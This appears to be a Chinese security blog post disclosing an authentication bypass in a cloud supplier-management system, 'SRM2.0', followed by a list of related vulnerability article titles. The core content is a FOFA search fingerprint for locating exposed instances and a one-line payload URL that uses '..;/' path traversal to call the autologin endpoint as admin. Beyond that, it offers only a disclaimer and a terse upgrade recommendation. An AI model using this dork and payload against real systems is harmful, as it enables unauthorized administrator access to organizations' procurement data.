某云彩SRM2.0后台绕过漏洞

扣脚大汉在网络2024-09-06 16:01

文章目录

免责申明

本文章仅供学习与交流,请勿用于非法用途,均由使用者本人负责,文章作者不为此承担任何责任

搜索语法

fofa

复制代码 
icon_hash="1665918155"

漏洞描述

某云采 SRM2.0是一款先进的供应链管理系统,旨在优化企业的采购流程和供应商管理。该系统通过云端技术,提供实时的数据分析和智能决策支持,帮助企业提高采购效率和降低成本。

该系统在autologin接口处存在权限绕过漏洞

漏洞复现

payload

复制代码 
http://ip/adpweb/static/..;/api/sys/app/autologin?loginName=admin

修复建议

更新到最新版本

相关推荐
独角鲸网络安全实验室3 天前
高危预警!React核心组件曝CVSS 9.8漏洞,数百万开发者面临远程代码执行风险
运维·前端·react.js·网络安全·企业安全·漏洞·cve-2025-11953
独角鲸网络安全实验室3 天前
高危预警!React CVE-2025-55182 突破 RSC 防护,未授权 RCE 威胁 39% 云应用
前端·react.js·网络安全·前端框架·漏洞·rce·cve-2025-55182
网络研究院9 天前
监管要求不统一暴露了移动安全方面的漏洞
网络·安全·漏洞·风险·监管
至善迎风15 天前
React2Shell(CVE-2025-55182)漏洞服务器排查完整指南
网络安全·react·数据安全·漏洞·next·rsc·cve-2025-55182
奔跑吧邓邓子3 个月前
【C++实战(75)】筑牢安全防线,攻克漏洞难题
c++·安全·实战·漏洞
黑客思维者3 个月前
Notepad++中高危DLL劫持漏洞深度剖析
notepad++·漏洞·dll劫持
李白你好3 个月前
CVE-2025-2502 / CNVD-2025-16450 联想电脑管家权限提升漏洞
漏洞
网络研究院4 个月前
Citrix 零日漏洞自五月起遭积极利用
网络·安全·漏洞·威胁
网络研究院4 个月前
新的 SHAMOS MacOS 窃取程序利用单行终端命令攻击用户
macos·攻击·漏洞·用户
IT 青年4 个月前
CVE-2014-6271(bash破壳漏洞 )
漏洞
热门推荐
01GitHub 镜像站点02UV安装并设置国内源03Linux下V2Ray安装配置指南04在VSCode配置Java开发环境的保姆级教程(适配各类AI编程IDE)05安娜的档案(Anna’s Archive) 镜像网站/国内最新可访问入口(持续更新)06Multisim使用教程详尽版--(2025最新版)07Gemini3 生成的基于手势控制3D粒子圣诞树08Labelme从安装到标注:零基础完整指南09CentOS的ISO镜像下载10jdk21下载、安装(Windows、Linux、macOS)